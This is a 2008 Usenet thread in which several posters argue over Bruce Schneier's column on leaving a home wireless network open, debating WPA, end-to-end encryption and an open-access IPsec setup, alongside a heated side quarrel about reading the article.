>>accessible through the tunnels (IPSec), what attack do you anticipate?
>
>Any of the myriad of possible attacks.
That's not the relevant question in any event.
The relevant question is: What attacks have you not anticipated?
The answer to that question is, of course, unknowable, which is part of
why it makes no sense to forgo the easy and substantial protection
afforded by securing the wireless network.
> On Sat, 29 Nov 2008 17:11:09 -0600, msg <msg@_cybertheque.org_> wrote in
> <wvmdnYvABfFnVqzU...@posted.cpinternet>:
>
>
>>John Navas wrote:
>
>
>>>Simply running a wireless network is an advertisement, and even with
>>>encrypted tunnels your computers are still open to attack unless you
>>>also have wireless to wireless isolation (along with wireless to wired
>>>isolation if you have wired computers as well). You otherwise increase
>>>your vulnerability substantially.
<snip>
> Regardless, how exactly is this set up?
I should point out that my open access networks are by choice and design to
encourage stranger connections; public access is part of the mission.
Michael
>John Navas wrote:
>> Regardless, how exactly is this set up?
>
>The external wireless access points are on an IP subnet routed by an OpenBSD
>border router which also is the head end for IPsec and IKE from external
>wireless; nothing else is on that subnet. Stranger clients get access
>to a limited set of resources (for advertising purposes) such as http
>to an internal server, DNS, DHCP, and IKE and VPN negotiation services;
>all services are handled by port forwarding and in some cases internal
>NATing. The address pool presented to the external client is RFC 1918;
>stranger clients are welcome to browse the presented web pages, use the
>bulletin board, or do other things as I see fit; the only security
>issues for me here are at the service endpoints -- the user can sniff
>all he wants and will only see this traffic or encrypted payloads from
>VPN users.
Other security issues for you include mistakes you may have made, holes
you may have missed, and exploits in your equipment you may not know
about. There is no such thing as a secure network.
>> I disagree -- it's all one network.
>
>I cannot imagine (in an unclassified network) imposing draconian network
>level security on internal users; applications, database encryption, access
>control etc. seems to me to be more appropriate at this level.
WPA is anything but draconian.
>On Sat, 29 Nov 2008 03:02:07 -0600, Char Jackson <no...@none.invalid>
>wrote:
>
>>>Did you read the article?
>>
>>No, I was responding to what you wrote, not to what someone wrote in
>>an article. You didn't make it clear that I had to read the article
>>before climbing onto the ride. :)
>
>Methinks you might find it useful to read the article before
>attempting to criticize my interpretation of the article:
Again, I wasn't responding to the article. I was responding to you.
Without having read the article you know nothing about the context of
what he wrote.
>Again, I wasn't responding to the article. I was responding to you.
Three problems:
1. I hate one-line unsubstantiated comments (like this one).
2. How can you provide an informed opinion on my comments about
something you haven't read? You might comment on my style and logic,
but few readers care much about those. It's the validity of the sage
advice on wireless encryption, offered by a security expert, in a
widely distributed Wired Magazine article, that is important. If you
haven't read the article, I don't see how you can have an opinion
about the article's advice.
3. I suggest that you try really hard not to attack the person making
the comments and concentrate on the content. I kinda blew it with my
initial rant, for which I promised to resist the temptation to repeat
the mistake. If you haven't read the article, you know nothing of the
content.
I also avoided responding to your previous posting, which offered no
substantiation for any of your opinions, and only questioned my logic
and interpretations. With all due respect, I really don't care about
anyone's opinions. It's the logic and facts that they offer to
substantiate those opinions that I find interesting and useful.
For example, you asked:
>>Leave the WPA security disabled because it might be cracked.
>See? THAT! How did you arrive there? Besides you, who else suggested
>it would be a good idea to leave WPA disabled because it might be
>cracked? If not from you, did you get it from the article? That's
>really all I'm asking.
Instead of commenting on the validity of my interpretation, you
decided that it would be more fun to attack my logic. Do you really
need an answer as to how I derived my conclusion? How will that be
useful to anyone reading it? If my logic were defective, you couldn't
offer an alternative, surely without actually reading the article.
Like I said.... I hate security discussions.
Even if one could consider WPA 'draconian', you've obviously never worked
in a corporate environment.
You /really/ think that, say, a bank can run an open wifi hotspot with
access to its internal networks, in the middle of a large city,
surrounded by its competitors?
> applications, database encryption, access
> control etc. seems to me to be more appropriate at this level.
These are part of the answer, yes.
>On Sat, 29 Nov 2008 22:03:50 -0600, Char Jackson <no...@none.invalid>
>wrote in <q344j4pab14fvk1no...@4ax.com>:
>
>>On Sat, 29 Nov 2008 10:38:48 -0800, Jeff Liebermann <je...@cruzio.com>
>>wrote:
>>
>>>On Sat, 29 Nov 2008 03:02:07 -0600, Char Jackson <no...@none.invalid>
>>>wrote:
>>>
>>>>>Did you read the article?
>>>>
>>>>No, I was responding to what you wrote, not to what someone wrote in
>>>>an article. You didn't make it clear that I had to read the article
>>>>before climbing onto the ride. :)
>>>
>>>Methinks you might find it useful to read the article before
>>>attempting to criticize my interpretation of the article:
>>
>>Again, I wasn't responding to the article. I was responding to you.
>
>Without having read the article you know nothing about the context of
>what he wrote.
Thanks, but you're talking to the wrong person. Jeff wrote the OP and
he alone controlled its context.
>On Sat, 29 Nov 2008 22:03:50 -0600, Char Jackson <no...@none.invalid>
>wrote:
>
>>Again, I wasn't responding to the article. I was responding to you.
>
>Three problems:
>
>1. I hate one-line unsubstantiated comments (like this one).
>
>2. How can you provide an informed opinion on my comments about
>something you haven't read?
I read your comments. I commented on your comments. Why is that hard
to understand? I never claimed to be commenting on the article.
>If you haven't read the article, I don't see how you can have an
>opinion about the article's advice.
Good point. That's why I didn't offer an opinion about the article's
advice.
>3. I suggest that you try really hard not to attack the person making
>the comments and concentrate on the content. I kinda blew it with my
>initial rant, for which I promised to resist the temptation to repeat
>the mistake. If you haven't read the article, you know nothing of the
>content.
I haven't read the article. I know nothing of the content. That's why
I didn't comment on the content of the article.
OTOH, I read your OP, and I commented on what you wrote. That's all.
>I also avoided responding to your previous posting, which offered no
>substantiation for any of your opinions, and only questioned my logic
>and interpretations.
That's correct, I questioned your logic and interpretations. I still
do.
>Instead of commenting on the validity of my interpretation, you
>decided that it would be more fun to attack my logic.
What do you mean, 'instead of commenting on the validity of [your]
interpretations'? Just 2 lines above you seemed to understand that I
was questioning your (logic and) interpretations.
>Do you really need an answer as to how I derived my conclusion?
We're making progress. In your first response, you denied making a
conclusion. But yes, I was curious as to how you arrived where you
arrived, since your position didn't logically follow from what you
quoted in your OP.
>Like I said.... I hate security discussions.
I can see why.
No he didn't. John wrote the original post, you replied noting Bruce
Schneier's contentious article, and Jeff was commenting on the article.
And to reiterate - since you admit to not having read the article, to
write a criticism of Jeff's comments on it seems.... arrogant.... for
want of a better word.
Yes you did - when you asserted that Jeff was either misinterpreting or
misrepresenting it.
>> If you haven't read the article, I don't see how you can have an
>> opinion about the article's advice.
>
> Good point. That's why I didn't offer an opinion about the article's
> advice.
But you did.
> I haven't read the article. I know nothing of the content. That's why
> I didn't comment on the content of the article.
if the above were true...
>> I also avoided responding to your previous posting, which offered no
>> substantiation for any of your opinions, and only questioned my logic
>> and interpretations.
>
> That's correct, I questioned your logic and interpretations. I still
> do.
... then you were in no position to do this. How can you possibly
question someone's interpretation of something you've not read yourself?
No, strike that, it was a rhetorical question. Politicians do it all the
time, it's called "making stuff up to suit a personal agenda".
There's no point debating this further tho - you've been caught in a lie
and are too bull-headed to admit you screwed up. Lesson learned.
>Char Jackson wrote:
>> On Sat, 29 Nov 2008 20:22:56 -0800, John Navas
>> <spamf...@navasgroup.com> wrote:
>>
>>> On Sat, 29 Nov 2008 22:03:50 -0600, Char Jackson <no...@none.invalid>
>>> wrote in <q344j4pab14fvk1no...@4ax.com>:
>>>
>>>> On Sat, 29 Nov 2008 10:38:48 -0800, Jeff Liebermann <je...@cruzio.com>
>>>> wrote:
>>>>
>>>>> On Sat, 29 Nov 2008 03:02:07 -0600, Char Jackson <no...@none.invalid>
>>>>> wrote:
>>>>>
>>>>>>> Did you read the article?
>>>>>> No, I was responding to what you wrote, not to what someone wrote in
>>>>>> an article. You didn't make it clear that I had to read the article
>>>>>> before climbing onto the ride. :)
>>>>> Methinks you might find it useful to read the article before
>>>>> attempting to criticize my interpretation of the article:
>>>> Again, I wasn't responding to the article. I was responding to you.
>>> Without having read the article you know nothing about the context of
>>> what he wrote.
>>
>> Thanks, but you're talking to the wrong person. Jeff wrote the OP and
>> he alone controlled its context.
>
>No he didn't. John wrote the original post,
You're right. I thought Jeff's "I'm late for a free lunch" post was
the start of the thread. I stand corrected.
>you replied noting Bruce
>Schneier's contentious article, and Jeff was commenting on the article.
I didn't note any articles, I only commented on Jeff's conclusions,
with which I didn't agree.
>And to reiterate - since you admit to not having read the article, to
>write a criticism of Jeff's comments on it seems.... arrogant.... for
>want of a better word.
I don't understand why you'd feel that way, but I respect your opinion
and will give it all the consideration it deserves.
>Char Jackson wrote:
>> On Sat, 29 Nov 2008 20:52:11 -0800, Jeff Liebermann <je...@cruzio.com>
>> wrote:
>>
>>> 2. How can you provide an informed opinion on my comments about
>>> something you haven't read?
>>
>> I read your comments. I commented on your comments. Why is that hard
>> to understand? I never claimed to be commenting on the article.
>
>Yes you did - when you asserted that Jeff was either misinterpreting or
>misrepresenting it.
Nice try, but no cigar. It looks to me like Jeff quoted a bit from
that article, and then commented on it. I commented on his comments.
It looked to me like he was completely missing the point (of the part
that he quoted) and had come to a very faulty conclusion.
Would I have felt the same way if I had read the entire article? I
don't know, but if the answer is yes then Jeff did a poor job of
quoting from the article.
>>> If you haven't read the article, I don't see how you can have an
>>> opinion about the article's advice.
>>
>> Good point. That's why I didn't offer an opinion about the article's
>> advice.
>
>But you did.
I disagree. I don't even know what the article's advice was. What I
did comment on, (I feel like a broken record but a couple of folks
seem to be particularly thick), was Jeff's comments following his
quoted material.
>> I haven't read the article. I know nothing of the content. That's why
>> I didn't comment on the content of the article.
>
>if the above were true...
Do you see something that isn't true?
>>> I also avoided responding to your previous posting, which offered no
>>> substantiation for any of your opinions, and only questioned my logic
>>> and interpretations.
>>
>> That's correct, I questioned your logic and interpretations. I still
>> do.
>
>... then you were in no position to do this. How can you possibly
>question someone's interpretation of something you've not read yourself?
Easy! Jeff quoted it! Did you even see his "I'm late for a free lunch
post", or are you just coming into the thread now? Go back and read it
and see for yourself. No need to make a fool of yourself like this.
>No, strike that, it was a rhetorical question. Politicians do it all the
>time, it's called "making stuff up to suit a personal agenda".
>
>There's no point debating this further tho - you've been caught in a lie
>and are too bull-headed to admit you screwed up. Lesson learned.
Nice.
> msg wrote:
>
>> John Navas wrote:
>>
>>>
>>> I disagree -- it's all one network.
>>
>>
>> I cannot imagine (in an unclassified network) imposing draconian network
>> level security on internal users;
>
>
> Even if one could consider WPA 'draconian' you've obviously never worked
> in a corporate environment.
Au contraire, mon ami. I wasn't referring to WPA as draconian, but to
the implication that the same level of _network_ security must always be
applied to internal users as to the outside world, which is often unacceptable
to commercial customers. I also expected such a comment in reply and
tend to resist the urge to mention experience, as analysis should stand on
its own in a discussion, but I have done considerable U.S.G. and commercial
networking.
Michael
>What do you mean, 'instead of commenting on the validity of [your]
>interpretations'? Just 2 lines above you seemed to understand that I
>was questioning your (logic and) interpretations.
>
>>Do you really need an answer as to how I derived my conclusion?
>
>We're making progress. In your first response, you denied making a
>conclusion. But yes, I was curious as to how you arrived where you
>arrived, since your position didn't logically follow from what you
>quoted in your OP.
In the interest of global harmony and universal peace, I'll explain
how I derived my conclusion.
1. I read the article at:
<http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
from which I quoted and commented:
>Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
>Swell. Leave your access point wide open because your neighbors might
>need it and because your chances of experiencing a problem is minimal.
>Never mind with encryption because it *MIGHT* be cracked in the
>future. While you're at it, leave your car doors unlocked for the
>same reasons. Door locks are easily picked, so why bother to use
>them.
2. To generate the above, I disassembled the quotation in the order
presented as:
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is."
in which the author affirms and re-affirms that WPA is a good security
protocol. I just noticed that his use of the word "new" is rather
odd, especially since WPA was introduced in late 2002 and has been
available since 2003. Also, note the double negative. From this, I
initially concluded that the author thinks highly of WPA encryption
and, being a security expert, would advocate its use.
3. However, that was countered in the next sentence:
> "But there are going to be
> security flaws in it; there always are."
which refers to his own previous praise of WPA. It implies that WPA
*MIGHT* have some fatal flaw in the future which hints that it might
not be suitable for general consumption. If someone suggested that
Brand X of some product *MIGHT* have some fatal flaw, one would
not generally consider such a testimonial as a recommendation.
4. At this point, I declared this to be FUD (fear, uncertainty,
doubt) on the basis of the sentence in #3. No facts are presented.
Only hints of doom and disaster. From my perspective, that's FUD.
5. Note that the original article (which you haven't read) would have
been equally effective at making his points without this sentence.
There's no connection between potential security flaws in WPA and
running an open network. If you're going to run an open network, it's
a non-issue. Yet, the author found it necessary to take a pot shot at
WPA, which I find interesting. My guess(tm) is that he wasn't so sure
of his recommendation to run an open network was all that good, and
needed some more ammunition. So, he hints that the main method of
securing a wireless network, is somehow useless because it *MIGHT* be
flawed in the distant future.
6. At this point, I expected a discussion by the author of
wireless security. Instead, he instantly changes topic to:
> "I spoke to several lawyers about this, and in their
> lawyerly way they outlined several other risks with
> leaving your network open."
Huh? What happened to wireless security? It's for this reason and
similar abrupt topic changes that I suspect that the original article
may have been heavily edited or grafted together from bits and pieces.
In any case, this change effectively ended any discussion on WPA by
the author.
7. The rest of the article is about various risks and methods of
running an open network. In the last paragraph, he announces:
> "In my opinion, securing my wireless network isn't worth it."
which I presume to be the author's conclusion based on prospective
flaws in WPA and that he and others have successfully "gotten away
with it" by running an open wireless network without incident. I
concluded that he is recommending that we also do the same, however he
doesn't have the guts to say that.
If you fail to appreciate my logic, that's fine. I don't expect
everyone to think in precisely the same way. What I would find
interesting is if you would condescend to read the original article, and
comment on the author's advice, purpose, logic, and anecdotes.
Every election, some of my friends usually complain that this or that
measure didn't pass or that their favorite politician wasn't elected.
After listening to the logic and rationalizations, I ask "Did you
vote"? Quite often, the answer is "no", at which point I follow with
"Then you don't have a right to an opinion". Read the article.
>Char Jackson wrote:
>> Thanks, but you're talking to the wrong person. Jeff wrote the OP and
>> he alone controlled its context.
>
>No he didn't. John wrote the original post, you replied noting Bruce
>Schneier's contentious article, and Jeff was commenting on the article.
>
>And to reiterate - since you admit to not having read the article, to
>write a criticism of Jeff's comments on it seems.... arrogant.... for
>want of a better word.
How about "ignorant"? "Lazy"? "Judgmental"?
>>Do you really need an answer as to how I derived my conclusion?
>
>We're making progress. ...
I've added "pedantic" and "supercilious" to the list.
--
Best regards,
John Navas <http:/navasgroup.com>
"Nothing is as peevish and pedantic as men's judgments of one another." [Desiderius Erasmus]
>Char Jackson wrote:
>> That's correct, I questioned your logic and interpretations. I still
>> do.
>
>... then you were in no position to do this. How can you possibly
>question someone's interpretation of something you've not read yourself?
>
>No, strike that, it was a rhetorical question. Politicians do it all the
>time, it's called "making stuff up to suit a personal agenda".
>
>There's no point debating this further tho - you've been caught in a lie
>and are too bull-headed to admit you screwed up. Lesson learned.
Yep.
--
Best regards,
John Navas <http:/navasgroup.com>
"A little learning is a dangerous thing." [Alexander Pope]
"It is better to sit in silence and appear ignorant,
than to open your mouth and remove all doubt." [Mark Twain]
"Being ignorant is not so much a shame, as being unwilling to learn."
[Benjamin Franklin]
>Every election, some of my friends usually complain that this or that
>measure didn't pass or that their favorite politician wasn't elected.
>After listening to the logic and rationalizations, I ask "Did you
>vote"? Quite often, the answer is "no", at which point I follow with
>"Then you don't have a right to an opinion". Read the article.
Amen.
--
Best regards,
John Navas <http:/navasgroup.com>
"Usenet is like a herd of performing elephants with diarrhea - massive,
difficult to redirect, awe inspiring, entertaining, and a source of mind
boggling amounts of excrement when you least expect it." --Gene Spafford
>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
><notv...@cox.net.invalid> wrote:
>
>>Interesting counter point to securing your wireless
>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>
>Bruce Schneier is a well regarded author of criticism on security
>issues. He's made a career of writing articles, columns, and two
>books on the topic. Scan the list of titles and tell me if you see a
>pattern:
><http://www.schneier.com/essays.html>
>
>...
>
>Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
On further reflection, methinks this might have something to do with him
still being a bit miffed at the way his Twofish algorithm was soundly
trounced by Rijndael (Joan Daemen & Vincent Rijmen) in the Advanced
Encryption Standard (AES) competition. WPA is of course based on AES.
;)
>On Fri, 28 Nov 2008 12:11:32 -0800, Jeff Liebermann <je...@cruzio.com>
>wrote in <a7j0j4homh91cibds...@4ax.com>:
>
>>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
>><notv...@cox.net.invalid> wrote:
>>
>>>Interesting counter point to securing your wireless
>>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>>
>>Bruce Schneier is a well regarded author of criticism on security
>>issues. He's made a career of writing articles, columns, and two
>>books on the topic. Scan the list of titles and tell me if you see a
>>pattern:
>><http://www.schneier.com/essays.html>
>>
>>...
>>
>>Do you subscribe to this manner of FUD (fear uncertainty doubt):
>> "This is not to say that the new wireless security protocol,
>> WPA, isn't very good. It is. But there are going to be
>> security flaws in it; there always are."
>
>On further reflection, methinks this might have something to do with him
>still being a bit miffed at the way his Twofish algorithm was soundly
>trounced by Rijndael (Joan Daemen & Vincent Rijmen) in the Advanced
>Encryption Standard (AES) competition. WPA is of course based on AES.
>;)
Good point. I didn't make the connection until you mentioned it.
However, I don't think he has any hard feelings. There were 5
algorithms in the AES competition. That means there were 4 other
losers.
Bruce Schneier also has a web page on Twofish that doesn't seem even
slightly irate or miffed:
<http://www.schneier.com/twofish.html>
Lots of applications use Twofish, probably because of the lack of
license fees. Anyway, that was 8 years ago. One would think he has
gotten over it by now.
No matter the reason, justification, or sour grapes, his comment on
WPA might have security flaws is in bad taste, and his subsequent
suggestions to run an open wireless network is just plain lousy
advice.
I don't think he suggests anyone else run an unsecured network; he merely
outlined some of the thoughts he had in doing risk analysis on running
an open access point at his house.
John
>> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>I don't think he suggests anyone else run an unsecured network; he merely
>outlined some of the thoughts he had in doing risk analysis on running
>an open access point at his house.
>John
If that's true, why did you post the Bruce Schneier URL in the first
place?
John Navas started by posting a wireless security checklist that
features WPA as the prime method of achieving security.
You then followed up with:
> Interesting counter point to securing your wireless
> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
> John
By implication, using WPA means that one is not running an open access
point. If the Wired Magazine article is not about running an open
unsecured wireless system, precisely what is your "interesting
counterpoint" all about?
Incidentally, I was going to write a satire in the style of the Wired
Magazine article on driving the wrong way on the freeway. It's a
great way to get anywhere fast. The risks are minimal because law
enforcement is usually ineffective and besides, a good lawyer will get
you off on technicalities and procedures. It also saves gasoline
taking the shortest path. Ad nauseam. I had planned to do this
without ever advocating that anyone drive the wrong way on the
freeway. Just vague implications and anecdotes of success stories.
However, I'm getting tired of all this. If you want to leave your
house, car, business, or wireless wide open, by all means, please do
so. Just don't tell other users that are not as technically astute,
can't recognize an attack when they see one, and have no clue what's
happening, to do the same. It should be Secure by Default.
From my point of view it was interesting to read a contrarian view that
included some discussion of the risk analysis process.
Probably should have included a bit of my own text in with the reply to
stage it in the manner that I meant.
John
Whatever. You've ceased to surprise me with your weaselly denials that
you screwed up, and any lingering interest I might have had in getting
you to see sense has died.
> It looks to me like Jeff quoted a bit from
> that article, and then commented on it. I commented on his comments.
Which was impossible without reading the article.
>> But you did.
>
> I disagree. I don't even know what the article's advice was.
Exactly.
Fair enough, I misinterpreted your remarks as being related to the topic
under discussion :-)
> but to
> implications that the same level of _network_ security is always indicated
> to be applied to internal users as to the outside world is often
> unacceptable to commercial customers.
I can't quite parse that sentence. I'll assume it means commercial
customers often won't accept having the same security applied internally
as externally; if it means something different then please clarify.
Assuming I'm interpreting it correctly - I agree, clueless customers
often insist on rubbish internal security. These would be the ones who
lose USB sticks in pubs, leave laptops on trains, allow the cleaners to
copy their customer contact database and allow leavers to email their
top clients' details to a rival.
> I also expected such a comment in reply and
> tend to resist the urge to mention experience, as analysis should stand on
> its own in a discussion, but I have done considerable U.S.G. and commercial
> networking.
Experience of govt computing does /not/ impress me. In the past I've
worked with Whitehall and a more computer-clueless bunch of chinless
arts-grad wonders would be hard to find even if you asked Monty Python
to re-enact the Upper Class Twit of the Year Show. :-)
> msg wrote:
...
>> implications that the same level of _network_ security is always
>> indicated to be applied to internal users as to the outside world is often
>> unacceptable to commercial customers.
>
>
> I can't quite parse that sentence. I'll assume it means commercial
> customers often won't accept having the same security applied internally
> as externally;
Yes
> ...allow the cleaners to copy their customer contact database
I like this one.
Michael
>On Sun, 30 Nov 2008 12:20:32 -0800, John Navas
><spamf...@navasgroup.com> wrote:
>>On further reflection, methinks this might have something to do with him
>>still being a bit miffed at the way his Twofish algorithm was soundly
>>trounced by Rijndael (Joan Daemen & Vincent Rijmen) in the Advanced
>>Encryption Standard (AES) competition. WPA is of course based on AES.
>>;)
>
>Good point. I didn't make the connection until you mentioned it.
>However, I don't think he has any hard feelings. There were 5
>algorithms in the AES competition. That means there were 4 other
>losers.
Most of the others didn't come close to Twofish and Rijndael, the
notable exception being Serpent. Regardless, I don't think this has any
real bearing on my speculation.
>Bruce Schneier also has a web page on Twofish that doesn't seem even
>slightly irate or miffed:
><http://www.schneier.com/twofish.html>
>Lots of applications use Twofish, probably because of the lack of
>license fees.
Rijndael is likewise free of license fees, and is much more widely used
even outside of AES. Even the earlier Blowfish is more widely used than
Twofish.
>Anyway, that was 8 years ago. One would think he has
>gotten over it by now.
I dunno about that -- I've heard stories, and scientists have been
famously known to hold grudges for much longer.
>No matter the reason, justification, or sour grapes, his comment on
>WPA might have security flaws is in bad taste, and his subsequent
>suggestions to run an open wireless network is just plain lousy
>advice.
Agreed.
> From my point of view it was interesting to read a contrarian view that
>included some discussion of the risk analysis process.
The risk analysis was seriously flawed.
Jeff Liebermann wrote:
> As I've mentioned several times, the computer can be almost totally
> protected, but without encrypting the wireless traffic, a simple
> sniffer can capture unencrypted traffic, passwords, email, etc.
I prefer, and heartily recommend, regardless of wireless encryption,
end-to-end encryption. If you don't trust your traffic in wireless
space (because you can't control whether it can be intercepted in that
space), why would you trust it travelling over wires you don't control?
> ... No amount of security is ever sufficient. Given sufficient time,
> resources, and technology, any level of security can eventually be
> compromised. ...
Yes. That's precisely the point.
> ... What I find offensive about Schneier's article is that he trashes
> the most basic and easiest form of security, which in this case is WPA.
We differ here. I don't feel he trashed it, but rather put it in the
same context as what I quoted from you just above ("no amount of
security ..."), then pointed out that he operates his own wireless
network without WPA, and makes a case why he believes this is a good
thing.
> To get decent security, the one part of the puzzle that must work is
> WPA. Everything else can be no more than an additional obstacle,
> usually of minor importance.
Given a suitable definition of "security", perhaps, but then I would
likely disagree with the definition of "security".
To get decent security, we must first understand what it is we are
securing. Is it the data? Where is the data? What is the data's
lifespan? Is it access to the computer(s)? Is it access to the network?
Securing each of these things is done differently than each of the
others.
> ... I'm undecided as to whether it's better to protect the data or
> control access. ...
My sense on that is that it's case-by-case dependent, but more often
than not, protecting the data regardless of access control on the
network is warranted.
> I honestly don't care why or how he runs his open network. It's bad
> advice for the general public, most of whom fail to appreciate the
> risks and implications.
I agree that for most people it would not be advisable to leave network
access open.
>> ... even if WPA is considered a suitable way to secure access to your
>> network at the moment, don't count on it to secure the data on your
>> computer.
> Ummm... it secures the data transport, not the computer.
It controls access to, and encrypts *a portion* of the data transport,
unless your data is residing strictly within an ad-hoc wireless network.
At some point that data will travel on wires on its way to its ultimate
destination. If you're concerned about protecting data in transit, you
need to protect it end-to-end, not just over one (wired or wireless)
link.
> ... I'm sure he also uses a VPN and SSH to talk to his work computers.
> Great idea, but somehow missing in his article advocating running an
> unencrypted network.
Agreed. I'm guessing, but I suspect the author assumes the reader is a
regular reader and already knows about end-to-end encryption techniques.
If my guess is correct, that's an unfortunate assumption.
For what it's worth, all of this is one reason why I don't like "op-ed",
and I feel that such articles are frequently given much too much weight.
Bruce Schneier is respected among computer security professionals, but
this article was quite obviously (to me, anyway) just an opinion piece.
In my experience, Wired generally is.
> ... Most real security experts that I know, are constantly worried
> about this or that threat. Every time there's a new exploit
> announced, there's a flurry of nervous activity.
I consider myself pretty good with computer and network security,
perhaps even an "expert" (it is part of my job and has been for more
than a few years). I'm not nervous about systems I manage (whether my
own or managed for someone else).
> ... I had one such expert bail out in the middle of lunch when someone
> detailed a new exploit that he hadn't heard about. I pay security
> experts to be worried.
I prefer security experts that are informed and prepared ... I don't
want someone working with me who will do "anything" just for the sake of
doing "something".
> Again, wireless security (WPA) will not protect your computer. It
> will protect your network from sniffing.
Only on that particular link. I see (and refer to) WPA as a form of
access control. If you want to protect your data in transit, you need
to protect it beyond that initial wireless link.
(quoting Bruce Schneier's statement about WPA)
>> "But there are going to be security flaws in it; there always are."
> Note that the original article ... would have been equally effective
> at making his points without this sentence.
Agreed.
John Navas wrote:
> It's a bit like saying, condoms sometimes fail, so don't bother to use
> them. ...
Not exactly. It's more like saying "condoms sometimes fail, and they're
inconvenient" so I prefer to use a different (better) form of protection.
> WPA does protect your computer from attack over the wireless network.
... and it does so by controlling access to your network.
> That would not be a valid point -- WPA does provide real and valuable
> security. ....
WPA provides access control and encryption over one network link. It
works well for that. Most people need their data protected between two
endpoints that span multiple network links. WPA falls short on that.
> There's ample evidence that open wireless will be abused, with
> potentially negative consequences. All it takes is for the kid next
> door to use your wireless to file share illicit materials (imagine
> that); the RIAA and MPAA trace it back to your account; your computers
> get seized and you get sued.
Schneier points out in his article, however, that he feels he has the
perfect alibi for such a case, precisely by keeping his wireless network
access point unsecured. I wouldn't test that myself, by the way, nor
would I recommend it, but it's relevant to the discussion in the context
of the above quote.
Mark McIntyre wrote:
> Then his article is highly disingenuous, or he really is a fool. Does
> he run an encrypted VPN between every computer on his network? Is all
> traffic to the internet encrypted, including email?
I'm not defending the article or its author. I was simply pointing out
that one or more previous posters on this thread appear to have
misinterpreted the point of the article. Your question would be best
directed at the author.
--
----------------------------------------------------------------------
Sylvain Robitaille s...@alcor.concordia.ca
Systems analyst / AITS Concordia University
Faculty of Engineering and Computer Science Montreal, Quebec, Canada
----------------------------------------------------------------------
Not enough information to tell, as he doesn't detail the extent of other
controls on his home network.
John
> I don't think he suggests anyone else run an unsecured network; he merely
> outlined some of the thoughts he had in doing risk analysis on running
> an open access point at his house.
Hmm. I appreciate there are other translations of
"In my opinion, securing my wireless network isn't worth it."
but the most obvious one is that he doesn't think there's any point
securing a wireless network. Feel free to translate it differently....
Which is, indeed, one of the flaws.
It's like stating you don't see the point locking your house doors,
without mentioning the rabid wolf in your hallway.
You rang?
<http://802.11junk.com/jeffl/pics/jeffl/slides/jeffl-wolf.html>
I don't think WPA will protect anyone against "the rabid wolf in the
hallway". However, I have been known to ignore trespassers if they
bring caviar, sushi, or ice cream.
--
# Jeff Liebermann 150 Felker St #D Santa Cruz CA 95060
# 831-336-2558 je...@comix.santa-cruz.ca.us
# http://802.11junk.com je...@cruzio.com
# http://www.LearnByDestroying.com AE6KS
I translated it as, he doesn't feel it's worthwhile to secure *HIS*
wireless network, not *A* wireless network. Pretty big difference,
IMO. My wireless network, for example, is worth securing, and you
probably feel yours is, too. Apparently, his isn't.
>Jeff Liebermann wrote:
>
>> As I've mentioned several times, the computer can be almost totally
>> protected, but without encrypting the wireless traffic, a simple
>> sniffer can capture unencrypted traffic, passwords, email, etc.
>
>I prefer, and heartily recommend, regardless of wireless encryption,
>end-to-end encryption. If you don't trust your traffic in wireless
>space (because you can't control whether it can be intercepted in that
>space), why would you trust it travelling over wires you don't control?
While your point is valid in principle, in practice it's far more
difficult to snoop wired Internet traffic than open wireless traffic.
>> ... No amount of security is ever sufficient. Given sufficient time,
>> resources, and technology, any level of security can eventually be
>> compromised. ...
>
>Yes. That's precisely the point.
What point? That the NSA can do it, so why bother with security?
>I consider myself pretty good with computer and network security,
>perhaps even an "expert" (it is part of my job and has been for more
>than a few years). I'm not nervous about systems I manage (whether my
>own or managed for someone else).
You should be. No matter how good you are, those systems are still
vulnerable.
>> Again, wireless security (WPA) will not protect your computer. It
>> will protect your network from sniffing.
>
>Only on that particular link.
True, but that can be quite valuable as a part of the overall solution.
>I see (and refer to) WPA as a form of
>access control. If you want to protect your data in transit, you need
>to protect it beyond that initial wireless link.
Not necessarily -- it's a matter of relative risks, and the risk of open
wireless is orders of magnitude greater than the risk on the Internet
backbone.
>> It's a bit like saying, condoms sometimes fail, so don't bother to use
>> them. ...
>
>Not exactly. It's more like saying "condoms sometimes fail, and they're
>inconvenient" so I prefer to use a different (better) form of protection.
Abstinence? That's actually a pretty good analogy. If you're not going
to bother with WPA, then abstain from wireless.
>> WPA does protect your computer from attack over the wireless network.
>
>... and it does so by controlling access to your network.
Actually it encrypts the traffic.
>> That would not be a valid point -- WPA does provide real and valuable
>> security. ....
>
>WPA provides access control and encryption over one network link. It
>works well for that. Most people need their data protected between two
>endpoints that span multiple network links. WPA falls short on that.
I disagree on both counts. Feel free to provide real evidence to back
up those contentions.
>> There's ample evidence that open wireless will be abused, with
>> potentially negative consequences. All it takes is for the kid next
>> door to use your wireless to file share illicit materials (imagine
>> that); the RIAA and MPAA trace it back to your account; your computers
>> get seized and you get sued.
>
>Schneier points out in his article, however, that he feels he has the
>perfect alibi for such a case, precisely by keeping his wireless network
>access point unsecured. I wouldn't test that myself, by the way, nor
>would I recommend it, but it's relevant to the discussion in the context
>of the above quote.
There's ample evidence that he's wrong -- whether he prevails or not in
the end, he can still go through hell in the meantime.
>Mark McIntyre wrote:
>
>> Then his article is highly disingenuous, or he really is a fool. Does
>> he run an encrypted VPN between every computer on his network? Is all
>> traffic to the internet encrypted, including email?
>
>I'm not defending the article or its author. I was simply pointing out
>that one or more previous posters on this thread appear to have
>misinterpreted the point of the article. ....
In your opinion. Not in mine.
On the contrary -- his argument is based solely on computer-level
protection.
> While your point is valid in principle, in practice it's far more
> difficult to snoop wired Internet traffic than open wireless traffic.
That really depends on which side of the network you're sitting on.
Where I sit, they're both equally trivial. Where the average
script-kiddie sits, perhaps you're right, but the really serious threats
are usually "on the inside", where, once again, they're equally trivial.
>> I'm not nervous about systems I manage ...
>
